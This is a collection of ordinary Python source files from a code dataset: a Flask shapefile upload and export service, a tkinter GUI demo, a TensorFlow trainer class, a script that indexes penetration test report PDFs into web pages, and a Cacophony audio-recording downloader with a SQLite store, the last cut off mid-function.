duration))\r\n# start_time = time.time()\r\n\r\n\r\n #Evaluate the model periodically.\r\n if (step + 1) % 100 == 0 or (step + 1) == self.param.max_steps:\r\n print(\"%g\"%self.sess.run(self.eval_op,\r\n feed_dict={\r\n self.input_ph: testData,\r\n self.label_ph: testLabel,\r\n self.keep_prob: 1.0}))\r\n# start_time = time.time()\r\n# dhGen.saveData()\r\n# tr, tst = dhGen.randList(64)\r\n# dhGen.createBatch(tr,\"training\")\r\n## dhGen.createBatch(tst,\"test\")\r\n# return dhGen\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sess = tf.Session()\r\n imit = imitationLearner(sess)\r\n d = 
imit.run()\n","sub_path":"imitationLearner.py","file_name":"imitationLearner.py","file_ext":"py","file_size_in_byte":7715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"272065432","text":"#Python modules\nimport os\nimport zipfile\n\n#Flask modules\nfrom flask import request, redirect, url_for, render_template, json, Response, jsonify, send_file, send_from_directory\nfrom werkzeug.utils import secure_filename\n\n#Custom modules\nfrom app import app\nfrom app.domain.shape import Shapefile\nfrom app.domain.table import Table\nfrom app.domain.user import User\nfrom app.infrastructure.shapefileRepository import ShapefileRepository\n\n#Global variables\ncurrentFileName = None\nglobalTableName = None\nconnections = dict()\n\n# @app.route('/auth', methods=['GET', 'POST'])\n# def auth():\n# global connection\n# global credentials\n# credentials = dict(request.json)\n# if connection.credentialsAreValid(credentials):\n# return json.dumps({\"isConnected\": True})\n# return json.dumps({\"isConnected\": False})\n\n@app.route('/auth', methods=['GET', 'POST'])\ndef auth():\n credentials = dict(request.json)\n connections[request.json['token']] = ShapefileRepository()\n if connections[request.json['token']].credentialsAreValid(credentials):\n return json.dumps({\"isConnected\": True})\n return json.dumps({\"isConnected\": False})\n\n\nUPLOAD_FOLDER = os.path.join(os.getcwd(), 'shapefiles')\n@app.route('/uploads', methods=['POST'])\ndef upload():\n file = request.files['shapefiles']\n savePath = os.path.join(UPLOAD_FOLDER, secure_filename(file.filename))\n file.save(savePath)\n return Response(status=201)\n \n\n@app.route('/getFieldsAndTables', methods=['POST'])\ndef fields():\n fileName = request.json['filename']\n shapefile = Shapefile(f'shapefiles/{fileName}.shp')\n return jsonify(fields = shapefile.getFields(),\n tables = connections[request.json['token']].getTables())\n\n\n@app.route('/columns/<tableName>', methods=['POST'])\ndef columns(tableName):\n return json.dumps(connections[request.json['token']].getColumnsNames(tableName))\n\n\n@app.route('/save', methods=['POST'])\ndef save():\n selectedFields = request.json[\"message\"]\n fileName = request.json['filename']\n tableName = request.json['tableName']\n shapefile = Shapefile(f'shapefiles/{fileName}.shp')\n shapefile.format(selectedFields)\n returnedMessage = connections[request.json['token']].shpToPostgis(shapefile.DataDrame, connections[request.json['token']].getColumnsNames(tableName), tableName)\n return jsonify(message = returnedMessage)\n\n\n@app.route('/searchTables', methods=['POST'])\ndef searchTables():\n return jsonify(connections[request.json['token']].getTables())\n\n\nDOWNLOAD_FOLDER = os.path.join(os.getcwd(), 'download')\n@app.route('/recoverFile/', methods = [\"GET\", \"POST\"])\ndef recoverFile():\n tableName = request.json[\"selectedTable\"]\n selectedTable = Table(tableName, connections[request.json['token']].connector)\n try:\n selectedTable.extractShapefile(tableName, DOWNLOAD_FOLDER)\n except ValueError as erro:\n return str(erro) + \" - empty shapefile\"\n #return redirect(f'/downloadFile/{tableName}')\n return Response(status=201)\n \n\n@app.route('/downloadFile/<filename>', methods = [\"GET\", \"POST\"])\ndef download(filename):\n #filename = request.json[\"selectedTable\"]\n downloadedFileName = f'{filename}.zip'\n downloadedFile = zipfile.ZipFile(f'{DOWNLOAD_FOLDER}/' + downloadedFileName, 'w')\n extensions = [\".shp\", \".shx\", \".dbf\", \".cpg\", \".qix\", \".prj\"]\n for extension 
in extensions:\n try:\n downloadedFile.write(f'download/{filename}/' + filename + extension, arcname = filename + extension)\n except:\n pass\n \n downloadedFile.close()\n return send_from_directory(directory = DOWNLOAD_FOLDER, filename = downloadedFileName)\n\n\n@app.route('/saveDirectly', methods = ['POST'])\ndef saveDirectly():\n filename = request.json[\"filename\"]\n shapefile = Shapefile(f'shapefiles/{filename}.shp')\n connections[request.json['token']].saveDirectly(shapefile.DataDrame, filename)\n return Response(status = 201)\n","sub_path":"EQUIPE 2/backend/app/view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"443830259","text":"\"\"\"\nThis code will open up a GUI with 2 overlapping frames\nA button will raise the other frame\n\"\"\"\nfrom tkinter import *\n\n\nclass AxisFrame:\n def __init__(self, master):\n self.master = master\n\n # Make Frame 1 with Button to Raise Frame 2\n self.frame1 = Frame(master, relief=SUNKEN, border=2)\n self.frame1.grid(row=0, column=0, sticky=\"nsew\")\n self.toolButton = Button(self.frame1, text=\"NOVA\", width=10, fg=\"Black\", bg=\"Sky Blue\",\n font=(\"Helvetica\", 14), command=lambda: self.show_lps())\n self.tool = Label(self.frame1, text=\"FRAME 1\", font=(\"Helvetica\", 14))\n\n self.toolButton.pack(side=LEFT, padx=10, pady=10)\n self.tool.pack(side=RIGHT, padx=10, pady=10)\n\n # Make Frame 2 with Button to Raise Frame 1\n self.frame2 = Frame(master, relief=SUNKEN, border=2)\n self.frame2.grid(row=0, column=0, sticky=\"nsew\")\n self.toolButton = Button(self.frame2, text=\"LPS-1000\", width=10, fg=\"Black\", bg=\"Yellow\",\n font=(\"Helvetica\", 14), command=lambda: self.show_nova())\n self.tool = Label(self.frame2, text=\"FRAME 2\", font=(\"Helvetica\", 14))\n\n self.toolButton.pack(side=LEFT, padx=10, pady=10)\n self.tool.pack(side=RIGHT, padx=10, pady=10)\n\n def show_nova(self):\n self.frame1.lift()\n\n def show_lps(self):\n self.frame2.lift()\n\n\nclass Main:\n def __init__(self, master):\n self.master = master\n master.geometry(\"650x650\")\n master.title(\"R0: TIMC - Piping\")\n self.circ = AxisFrame(self.master)\n\n\nroot = Tk()\nTIMC = Main(root)\nroot.mainloop()\n","sub_path":"Development/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"639698625","text":"import abc\nimport logging\nimport random\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\n\nimport pymia.data.assembler as asmbl\nimport pymia.deeplearning.config as cfg\nimport pymia.deeplearning.data_handler as hdlr\nimport pymia.deeplearning.logging as log\nimport pymia.deeplearning.tensorflow.model as mdl\nimport pymia.deeplearning.training as train\n\n\nclass TensorFlowTrainer(train.Trainer, abc.ABC):\n\n def __init__(self, data_handler: hdlr.DataHandler, logger: log.Logger, config: cfg.DeepLearningConfiguration,\n model: mdl.TensorFlowModel, session: tf.Session):\n \"\"\"Initializes a new instance of the TensorFlowTrainer class.\n\n The subclasses need to implement following methods:\n\n - validate_on_subject\n - init_subject_assembler\n\n Args:\n data_handler: A data handler for the training and validation datasets.\n logger: A logger, which logs the training process.\n config: A configuration with training parameters.\n model: The model to train.\n session: A TensorFlow session.\n \"\"\"\n 
super().__init__(data_handler, logger, config, model)\n\n self.session = session\n self.model = model # set by base class too but done here such that IDE knows it is of type TensorFlowModel\n\n # init TensorFlow\n global_initializer_op = tf.global_variables_initializer()\n local_initializer_op = tf.local_variables_initializer() # e.g. for tf.metrics variables\n self.session.run(global_initializer_op)\n self.session.run(local_initializer_op)\n\n def batch_to_feed_dict(self, batch: dict, is_training: bool):\n \"\"\"Generates the TensorFlow feed dictionary.\n\n This basic implementation adds x, y, and is_training to the feed dictionary. Override this method to add further\n data to the feed dictionary.\n\n Args:\n batch: The batch from the data loader.\n is_training: Indicates whether it is the training or validation / testing phase.\n\n Returns:\n The feed dictionary.\n \"\"\"\n feed_dict = {self.model.x_placeholder: np.stack(batch['images'], axis=0),\n self.model.y_placeholder: np.stack(batch['labels'], axis=0),\n self.model.is_training_placeholder: is_training}\n\n return feed_dict\n\n def train_batch(self, idx, batch: dict):\n feed_dict = self.batch_to_feed_dict(batch, True)\n\n prediction, _, loss_val = self.session.run([self.model.network, self.model.optimizer, self.model.loss],\n feed_dict=feed_dict)\n\n if idx % self.log_nth_batch == 0:\n self.logger.log_batch(self.current_step, feed_dict=feed_dict)\n\n logging.info('Epoch {}, batch {}/{:d}: loss={:5f}'\n .format(self._get_current_epoch_formatted(),\n self._get_batch_index_formatted(idx),\n len(self.data_handler.loader_train),\n loss_val))\n\n self.current_step += 1\n\n return prediction, loss_val * len(batch['images'])\n\n def validate_batch(self, idx: int, batch: dict) -> (np.ndarray, float):\n \"\"\"Validates a batch.\n\n Args:\n idx: The batch index.\n batch: The batch.\n\n Returns:\n A tuple with the prediction and the loss value.\n \"\"\"\n feed_dict = self.batch_to_feed_dict(batch, False)\n prediction, loss_val = self.session.run([self.model.network, self.model.loss], feed_dict=feed_dict)\n return prediction, loss_val * len(batch['images'])\n\n def set_seed(self):\n \"\"\"Sets the seed depending of the current epoch.\n\n The seed is updated at the beginning of every epoch to ensure reproducible experiments.\n \"\"\"\n seed = self.seed + self.current_epoch\n logging.info('Epoch {}: Set seed to {}'.format(self._get_current_epoch_formatted(), seed))\n random.seed(seed)\n np.random.seed(seed)\n tf.set_random_seed(seed)\n torch.manual_seed(seed) # because pymia.data depends on torch\n\n def _check_and_load_if_model_exists(self):\n if self.model.load(self.model_dir):\n self.current_epoch = self.model.epoch.eval() + 1 # we save models always AFTER we finished an epoch,\n # now we enter the next epoch\n self.current_step = self.model.global_step.eval() # global step is incremented AFTER we have seen a batch\n self.best_model_score = self.model.best_model_score.eval()\n else:\n self.current_epoch = 1\n self.current_step = 0\n\n @abc.abstractmethod\n def init_subject_assembler(self) -> asmbl.Assembler:\n raise NotImplementedError('init_subject_assembler')\n\n @abc.abstractmethod\n def validate_on_subject(self, subject_assembler: asmbl.Assembler, is_training: bool):\n raise NotImplementedError('validate_on_subject')","sub_path":"pymia/deeplearning/tensorflow/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
+{"seq_id":"292142272","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ntemplate = \"\"\"---\nlayout: report\nimage: {ENGAGEMENT_PREVIEW_IMAGE} \nteam: {TEAM}\nengagement_name: {ENGAGEMENT} \nengagement_preview_file: {ENGAGEMENT_PREVIEW_IMAGE} \nengagement_pdf_file: {ENGAGEMENT_PDF_FILE} \nreport_keywords: {KEYWORDS}\nreport_cves: {CVES}\nreport_commands: {COMMANDS}\n\n# Page specifics\ntitle: {TEAM} - {ENGAGEMENT} \ndescription: View and download a complete penetration test report from {TEAM}. Learn about {TEAM}'s methodology and tools used in pentest reports.\n---\n\"\"\"\n\ndata = {\n\t\"items\": []\n}\n\nimport os\n\nfrom typing import List, Set\nimport subprocess\nfrom shlex import quote\n\nimport logging\nlogging.basicConfig(format='%(levelname)s %(message)s', level=logging.DEBUG)\n\nimport re\nimport pandas as pd\nimport PyPDF2\nfrom gensim.summarization import keywords\n\nimport json\n\nwith open('_scripts/commands.json') as commands_file:\n\tcommands = json.load(commands_file)[\"commands\"]\n\ncommand_names = [command[\"name\"].lower() for command in commands]\n\ndef extract_text(pdf_filename) -> str:\n\ttext = \"\"\n\twith open(pdf_filename, 'rb') as pdf_fd:\n\t\tpdf_reader = PyPDF2.PdfFileReader(pdf_fd)\n\t\tfor page in pdf_reader.pages:\n\t\t\ttry:\n\t\t\t\ttext += page.extractText()\n\t\t\texcept:\n\t\t\t\tpass\n\n\treturn text\n\ndef extract_keywords(text: str) -> List[str]:\n\tvalues = keywords(text = text, split = '\\n', scores = True)\n\tdata = pd.DataFrame(values, columns = ['keyword', 'score'])\n\tdata = data.sort_values('score', ascending = False)\n\treport_keywords = data[\"keyword\"].tolist()\n\treturn report_keywords\n\ndef extract_cves(text: str) -> Set[str]:\n\tr = re.compile(r'cve-\\d\\d\\d\\d-\\d\\d\\d\\d', re.IGNORECASE)\n\treturn set(sorted(re.findall(r, text)))\n\ndef extract_commands(text: str) -> Set[str]:\n\treturn [command_name for command_name in command_names if command_name in text]\n\nfor entry in os.listdir(\"reports\"):\n\tif entry not in [\".\", \"..\", \"index.md\"]:\n\t\tlogging.info('entry %s', entry)\n\t\treportDirName = \"reports/\" + entry\n\t\tfor file in os.listdir(os.path.join(\"reports\", entry)):\n\t\t\tif file.endswith(\".pdf\"):\n\t\t\t\tpdf_filename = f\"{reportDirName}/{file}\"\n\t\t\t\tlogging.info('file %s', file)\n\n\t\t\t\treport_text = extract_text(pdf_filename)\n\t\t\t\treport_text_lowered = report_text.lower()\n\n\t\t\t\treport_keywords = extract_keywords(report_text_lowered)\n\t\t\t\treport_cves = extract_cves(report_text)\n\t\t\t\treport_commands = extract_commands(report_text_lowered)\n\n\t\t\t\tbasefile = file[0:-4]\n\t\t\t\ttitle = basefile.replace('_', ' ')\n\t\t\t\tcontent = template.format(\n\t\t\t\t\tTEAM = entry,\n\t\t\t\t\tENGAGEMENT = title, \n\t\t\t\t\tENGAGEMENT_PREVIEW_IMAGE = f\"/reports/{entry}/{basefile}.png\",\n\t\t\t\t\tENGAGEMENT_PDF_FILE = basefile + '.pdf',\n\t\t\t\t\tKEYWORDS = ', '.join(report_keywords),\n\t\t\t\t\tCVES = ', '.join(report_cves),\n\t\t\t\t\tCOMMANDS = ','.join(report_commands)\n\t\t\t\t)\n\t\t\t\twith open(f\"reports/{entry}/{basefile}.md\", 'w') as fd:\n\t\t\t\t\tfd.write(content)\n\n\t\t\t\tdata[\"items\"].append({\n\t\t\t\t\t\"name\": f\"{entry} - {title}\",\n\t\t\t\t\t\"link\": f\"/reports/{entry}/{basefile}.html\" \n\t\t\t\t})\n\n\t\t\t\tos.system(\"pdftoppm -singlefile -png -f 1 -l 1 \" + quote(pdf_filename) + \" \" + quote(f\"{reportDirName}/{basefile}\"))\n\nimport yaml\n\nclass Dumper(yaml.Dumper):\n\tdef increase_indent(self, flow=False, *args, **kwargs):\n\t\treturn 
super().increase_indent(flow=flow, indentless=False)\n\nwith open(\"_data/reports.yml\", 'w') as fd:\n fd.write(yaml.dump(data, sort_keys=False, Dumper=Dumper))\n\n","sub_path":"_scripts/generate-report-data.py","file_name":"generate-report-data.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"158566149","text":"\nimport sqlite3\nfrom sqlite3 import Error\nimport requests\nimport os\nimport sys\nimport json\nfrom pathlib import Path\nfrom tkinter import filedialog\nfrom tkinter import *\nimport re\nfrom scipy.io import wavfile\nimport shutil\n# import scikits.audiolab\n# import sckikits as sc\n# \n# from sc import Sndfile, Format\n\nimport parameters\n\n\nimport glob\n\nimport numpy as np\nimport soundfile as sf\nimport librosa\n\n# from soundfile import SoundFile\n\n# import scipy.io\n# \n# import wavio\n# from code.Analysis import what\n# \n# ffmpegEXE = 'ffmpeg' # or ffmpeg.exe on windows etc\n# import subprocess as sp\n# \n# from pydub import AudioSegment\n# from scipy.io.wavfile import read\n\n\n#path to configs\n# sys.path.append('/home/jonah/Documents/opensmile-2.3.0/config/')\nsys.path.append('/home/tim/opensmile-2.3.0/config/')\n#path to input files\nsearch_path = '/home/tim/Work/Cacophony/opensmile_weka/TestAudioInput'\n#path to where we want the output\narff_path = '/home/tim/Work/Cacophony/opensmile_weka/TestAudioOutput'\n\n\ndb_file = \"audio_analysis_db\"\nconn = None\n\ndef get_database_connection():\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n\n # https://stackoverflow.com/questions/8587610/unboundlocalerror-local-variable-conn-referenced-before-assignment\n global conn\n if conn is None:\n try:\n conn = sqlite3.connect(db_file) \n except Error as e:\n print(e)\n \n return conn \n \n\ndef get_tags_from_server(device_id):\n print('about to get tags from server for device ', device_id)\n \n\ndef get_recordings_from_server(device_name, device_super_name):\n if not device_name:\n print('Device name can NOT be null')\n return\n \n if not device_super_name:\n print('Device Super name can NOT be null')\n return \n \n print('About to get recordings from server')\n retrieve_available_recordings_from_server(device_name, device_super_name)\n \ndef get_latest_recording_id_from_local_db(device_name, device_super_name):\n # Need the last recording ID for this device, that we already have \n\n# https://docs.python.org/2/library/sqlite3.html\n sql = ''' SELECT audio_file_id FROM audio_files WHERE device_super_name = ? 
ORDER BY audio_file_id DESC LIMIT 1'''\n cur = get_database_connection().cursor() \n \n cur.execute(sql,(device_super_name,)) \n \n rows = cur.fetchall() \n for row in rows:\n return row[0]\n \ndef retrieve_available_recordings_from_server(device_name, device_super_name): \n\n recordings_folder = getRecordingsFolder() \n\n ids_of_recordings_to_download = get_recording_ids_for_device_name(device_name)\n \n # remove ids of recordings that we already have\n already_downloaded = []\n for file in os.listdir(recordings_folder):\n already_downloaded.append(os.path.splitext(file)[0])\n \n already_downloaded_set = set(already_downloaded) \n \n ids_of_recordings_to_still_to_download = []\n \n for recording_id in ids_of_recordings_to_download:\n if recording_id not in already_downloaded_set:\n ids_of_recordings_to_still_to_download.append(recording_id)\n else:\n print('Already have recording ',recording_id, ' so will not download')\n \n for recording_id in ids_of_recordings_to_still_to_download:\n# print('About to get token for downloading ',recording_id)\n token_for_retrieving_recording = get_token_for_retrieving_recording(recording_id)\n print('About to get recording ',recording_id)\n get_recording_from_server(token_for_retrieving_recording, recording_id, device_name, device_super_name)\n \n # Also get recording information from server\n update_recording_information_for_single_recording(recording_id)\n \n print('Finished retrieving recordings') \n print('Now going to retrieve tags') \n get_all_tags_for_all_devices_in_local_database()\n print('Finished retrieving tags') \n print('Finished all') \n \ndef get_recording_from_server(token_for_retrieving_recording, recording_id, device_name, device_super_name):\n try:\n \n recording_local_filename = getRecordingsFolder() + '/' + recording_id + '.m4a'\n \n # Don't download it if we already have it. 
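\n        # (added note, not in the original source) the existence check below makes this download idempotent: a re-run only fetches ids whose <recording_id>.m4a file is missing from the recordings folder, so an interrupted session can simply be restarted.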
\n \n if not os.path.exists(recording_local_filename):\n url = parameters.server_endpoint + parameters.get_a_recording\n querystring = {\"jwt\":token_for_retrieving_recording} \n \n resp_for_getting_a_recording = requests.request(\"GET\", url, params=querystring)\n \n if resp_for_getting_a_recording.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp_for_getting_a_recording.text)\n return \n \n with open(recording_local_filename, 'wb') as f: \n f.write(resp_for_getting_a_recording.content)\n \n # Update local database\n insert_recording_into_database(recording_id,recording_id + '.m4a' ,device_name,device_super_name)\n \n else:\n print('\\t\\tAlready have recording ', str(recording_id) , ' - so will not download again\\n')\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to download recording ' + str(recording_id), '\\n')\n \ndef get_token_for_retrieving_recording(recording_id):\n user_token = get_cacophony_user_token()\n\n get_a_token_for_recording_endpoint = parameters.server_endpoint + parameters.get_a_token_for_getting_a_recording_url + recording_id\n\n headers = {'Authorization': user_token}\n\n resp_for_getting_a_recordingToken = requests.request(\"GET\", get_a_token_for_recording_endpoint, headers=headers)\n if resp_for_getting_a_recordingToken.status_code != 200:\n sys.exit('Could not get download token - exiting')\n recording_data = resp_for_getting_a_recordingToken.json()\n recording_download_token = recording_data['downloadFileJWT']\n \n return recording_download_token\n \ndef get_recording_ids_for_device_name(device_name): \n \n print('device_name ', device_name)\n \n device_id = get_device_id_using_device_name(device_name)\n print('device_id is ', device_id)\n ids_recordings_for_device_name = []\n offset = 0\n while True:\n ids_of_recordings_to_download= get_ids_of_recordings_to_download_using_deviceId(device_id,offset)\n print('ids_of_recordings_to_download ', ids_of_recordings_to_download)\n ids_recordings_for_device_name += ids_of_recordings_to_download\n if (len(ids_of_recordings_to_download) > 0):\n offset+=300\n else:\n break\n return ids_recordings_for_device_name\n\ndef get_ids_of_recordings_to_download_using_deviceId(deviceId, offset):\n # This will get a list of the recording ids for every recording of length 59,60,61,62 from device_name\n user_token = get_cacophony_user_token()\n \n url = parameters.server_endpoint + parameters.query_available_recordings\n \n where_param = {}\n where_param['DeviceId'] = deviceId\n where_param['duration'] = 59,60,61,62\n json_where_param = json.dumps(where_param) \n querystring = {\"offset\":offset, \"where\":json_where_param} \n \n headers = {'Authorization': user_token} \n\n resp = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n if resp.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp.text)\n sys.exit('Could not download file - exiting') \n \n data = resp.json() \n \n \n recordings = data['rows'] \n \n print('Number of recordings is ', len(recordings))\n\n ids_of_recordings_to_download = [] \n for recording in recordings: \n recording_id = str(recording['id'])\n ids_of_recordings_to_download.append(recording_id)\n \n return ids_of_recordings_to_download \n\ndef get_device_id_using_device_name(device_name):\n user_token = get_cacophony_user_token()\n url = parameters.server_endpoint + parameters.devices\n \n headers = {'Authorization': user_token} \n\n resp = requests.request(\"GET\", url, 
headers=headers)\n \n if resp.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp.text)\n sys.exit('Could not download file - exiting')\n \n data = resp.json()\n\n devices = data['devices'] \n rows = devices['rows']\n for row in rows:\n devicename = row['devicename'] \n if devicename == device_name:\n device_id = row['id']\n return device_id \n \ndef get_cacophony_user_token():\n if parameters.cacophony_user_token:\n return parameters.cacophony_user_token\n \n print('About to get user_token from server')\n username = parameters.cacophony_user_name\n if parameters.cacophony_user_password == '':\n parameters.cacophony_user_password = input(\"Enter password for Cacophony user \" + username + \" (or change cacophony_user_name in parameters file): \")\n \n requestBody = {\"nameOrEmail\": username, \"password\": parameters.cacophony_user_password }\n login_endpoint = parameters.server_endpoint + parameters.login_user_url\n resp = requests.post(login_endpoint, data=requestBody)\n if resp.status_code != 200:\n # This means something went wrong.\n sys.exit('Could not connect to Cacophony Server - exiting')\n \n data = resp.json()\n parameters.cacophony_user_token = data['token']\n return parameters.cacophony_user_token\n \ndef load_recordings_from_local_folder(device_name, device_super_name):\n \n input_folder = filedialog.askdirectory()\n\n recordings_folder = getRecordingsFolder()\n \n for filename in os.listdir( input_folder):\n recording_id = filename.replace('-','.').split('.')[0]\n filename2 = recording_id +'.m4a'\n\n insert_recording_into_database(recording_id,filename2,device_name,device_super_name)\n \n # Now move file to recordings folder\n audio_in_path = input_folder + '/' + filename \n audio_out_path = recordings_folder + '/' + filename2\n \n print('Moving ', filename, ' to ', audio_out_path)\n os.rename(audio_in_path, audio_out_path)\n\n # Now need to get information about this recording from server\n update_recording_information_for_single_recording(recording_id)\n \ndef insert_recording_into_database(recording_id,filename,device_name,device_super_name):\n try:\n sql = ''' INSERT INTO recordings(recording_id,filename,device_name,device_super_name)\n VALUES(?,?,?,?) '''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recording_id,filename,device_name,device_super_name))\n \n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert recording ' + str(recording_id), '\\n')\n \n\ndef update_recordings_folder(recordings_folder):\n print(\"new_recording_folder \", recordings_folder)\n \"\"\"\n update priority, begin_date, and end date of a task\n :param conn:\n :param recordings_folder:\n :return: project id\n \"\"\"\n sql = ''' UPDATE settings\n SET downloaded_recordings_folder = ? 
\n WHERE ID = 1'''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recordings_folder,))\n get_database_connection().commit() \n \ndef getRecordingsFolder():\n\n cur = get_database_connection().cursor()\n cur.execute(\"select * from settings\")\n \n rows = cur.fetchall()\n home = str(Path.home())\n print('home ', home)\n \n for row in rows: \n return home + '/' + row[0] \n \n \ndef getRecordingsFolderWithOutHome():\n cur = get_database_connection().cursor()\n cur.execute(\"select * from settings\")\n \n rows = cur.fetchall() \n \n for row in rows: \n return row[0] \n \ndef saveSettings(recordings_folder):\n print('recordings_folder ', recordings_folder)\n #https://stackoverflow.com/questions/16856647/sqlite3-programmingerror-incorrect-number-of-bindings-supplied-the-current-sta\n update_recordings_folder(recordings_folder)\n \ndef update_recording_information_for_single_recording(recording_id):\n print('About to update recording information for recording ', recording_id) \n recording_information = get_recording_information_for_a_single_recording(recording_id)\n print('recording_information ', recording_information) \n if recording_information == None: \n print('recording_information == None') \n return\n \n recording = recording_information['recording'] \n recordingDateTime = recording['recordingDateTime'] \n relativeToDawn = recording['relativeToDawn'] \n relativeToDusk = recording['relativeToDusk'] \n duration = recording['duration'] \n \n location = recording['location'] \n coordinates = location['coordinates'] \n locationLat = coordinates[0] \n locationLong = coordinates[1] \n \n version = recording['version'] \n batteryLevel = recording['batteryLevel'] \n \n additionalMetadata = recording['additionalMetadata'] \n phoneModel = additionalMetadata['Phone model'] \n androidApiLevel = additionalMetadata['Android API Level'] \n \n Device = recording['Device'] \n deviceId = Device['id']\n device_name = Device['devicename']\n \n nightRecording = 'false'\n \n if relativeToDusk is not None:\n if relativeToDusk > 0:\n nightRecording = 'true' \n elif relativeToDawn is not None:\n if relativeToDawn < 0:\n nightRecording = 'true' \n \n update_recording_in_database(recordingDateTime, relativeToDawn, relativeToDusk, duration, locationLat, locationLong, version, batteryLevel, phoneModel, androidApiLevel, deviceId, nightRecording, device_name, recording_id)\n print('Finished updating recording information for recording ', recording_id)\n \ndef test_update_recording_information_for_single_recording():\n update_recording_information_for_single_recording('291047')\n \ndef update_recording_in_database(recordingDateTime, relativeToDawn, relativeToDusk, duration, locationLat, locationLong, version, batteryLevel, phoneModel,androidApiLevel, deviceId, nightRecording, device_name, recording_id):\n try:\n conn = get_database_connection()\n # https://www.sqlitetutorial.net/sqlite-python/update/\n sql = ''' UPDATE recordings \n SET recordingDateTime = ?,\n relativeToDawn = ?,\n relativeToDusk = ?,\n duration = ?,\n locationLat = ?,\n locationLong = ?,\n version = ?,\n batteryLevel = ?,\n phoneModel = ?,\n androidApiLevel = ?,\n deviceId = ?,\n nightRecording = ?,\n device_name = ?\n WHERE recording_id = ? 
'''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recordingDateTime, relativeToDawn, relativeToDusk, duration, locationLat, locationLong, version, batteryLevel, phoneModel, androidApiLevel, deviceId, nightRecording, device_name, recording_id))\n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert recording ' + str(recording_id), '\\n')\n \ndef test_update_recording_in_database():\n update_recording_in_database('2018-04-04T17:07:01.000Z', 3, 1, 2, -22.2, 178.1, '23b', 77, 'ZTE phone',7, 1234, 'true', 'grants shed3', 291047)\n \n \ndef get_recording_information_for_a_single_recording(recording_id):\n user_token = get_cacophony_user_token()\n\n get_a_token_for_recording_endpoint = parameters.server_endpoint + parameters.get_information_on_single_recording + recording_id\n\n headers = {'Authorization': user_token}\n\n resp_for_getting_a_recordingToken = requests.request(\"GET\", get_a_token_for_recording_endpoint, headers=headers)\n if resp_for_getting_a_recordingToken.status_code != 200:\n print('Could not get download token')\n return None\n recording_data_for_single_recording = resp_for_getting_a_recordingToken.json() \n \n return recording_data_for_single_recording \n\ndef test_get_recording_information_for_a_single_recording():\n recording_data = get_recording_information_for_a_single_recording('197294')\n print('recording_data is: ', recording_data)\n\ndef update_recording_information_for_all_local_database_recordings():\n# conn = get_database_connection()\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT recording_id, recordingDateTime FROM recordings\")\n \n rows = cur.fetchall()\n \n for row in rows:\n # Don't update if we already have recordingDateTime\n recordingDateTime = row[1]\n if not recordingDateTime:\n print(recordingDateTime, ' is empty so will update record')\n recording_id = row[0]\n update_recording_information_for_single_recording(recording_id)\n print('Finished updating recording information')\n \ndef test_update_recording_information_for_all_local_database_recordings():\n update_recording_information_for_all_local_database_recordings()\n\ndef get_audio_recordings_with_tags_information_from_server(user_token, recording_type, deviceId):\n print('Retrieving recordings basic information from Cacophony Server\\n')\n url = parameters.server_endpoint + parameters.query_available_recordings\n \n where_param = {}\n where_param['type'] = recording_type \n where_param['DeviceId'] = deviceId\n json_where_param = json.dumps(where_param)\n querystring = {\"tagMode\":\"tagged\", \"where\":json_where_param} \n headers = {'Authorization': user_token} \n\n resp = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n if resp.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp.text)\n sys.exit('Could not download file - exiting') \n \n \n data = resp.json()\n \n recordings = data['rows']\n \n return recordings \n\ndef test_get_audio_recordings_with_tags_information_from_server():\n user_token = get_cacophony_user_token()\n recording_type = 'audio'\n deviceId = 379\n recordings = get_audio_recordings_with_tags_information_from_server(user_token, recording_type, str(deviceId))\n for recording in recordings:\n print(recording, '\\n')\n\ndef get_and_store_tag_information_for_recording(recording_id, deviceId, device_name, device_super_name):\n single_recording_full_information = get_recording_information_for_a_single_recording(recording_id)\n 
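# (added note, not in the original source) the per-recording payload from the server nests its tag dicts under recording['Tags']; each tag is flattened below into columns of the local sqlite tags table, keyed by the server-side id (server_Id) so repeat downloads are deduplicated.\n    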
recording = single_recording_full_information['recording'] \n tags = recording['Tags'] \n for tag in tags:\n server_Id = tag['id']\n what = tag['what']\n detail = tag['detail']\n confidence = tag['confidence']\n startTime = tag['startTime']\n duration = tag['duration']\n automatic = tag['automatic']\n version = tag['version']\n createdAt = tag['createdAt']\n tagger = tag['tagger'] \n tagger_username = tagger['username']\n insert_tag_into_database(recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name)\n \n \ndef test_get_and_store_tag_information_for_recording():\n get_and_store_tag_information_for_recording(str(197294), 123)\n \ndef insert_tag_into_database(recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name ):\n # Use this for tags that have been downloaded from the server\n try:\n if check_if_tag_alredy_in_database(server_Id):\n print('tag exists')\n return\n 